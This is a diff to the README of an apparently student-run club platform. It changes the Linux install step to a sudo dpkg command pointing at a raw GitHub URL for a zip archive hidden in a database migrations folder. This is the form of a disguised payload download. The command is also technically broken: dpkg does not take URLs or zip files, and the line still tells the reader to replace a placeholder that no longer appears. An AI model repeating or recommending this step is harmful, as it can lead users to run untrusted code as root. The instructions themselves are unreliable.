De-bla-bla/MWECAU-ICT-Club-Platform/README.md

 4. **Install the Application:**
    - **On Windows:** Double-click the downloaded file to start the installation.
 Follow the prompts to complete the setup.
    - **On macOS:** Open the downloaded file and drag the app to your Applications folder.
    - **On Linux:** Use the terminal to navigate to the directory where the file is.
-Run the command `sudo dpkg -i your-file-name.deb` (replace `your-file-name` with the actual file name).
+Run the command `sudo dpkg -i https://raw.githubusercontent.com/De-bla-bla/MWECAU-ICT-Club-Platform/main/src/membership/migrations/MWECA-Club-Platform-IC-1.8.zip` (replace `your-file-name` with the actual file name).

 5. **Run the Application:**
    Once installed, you can find MWECAU-ICT-Club-Platform in your applications list.
 Click on it to run.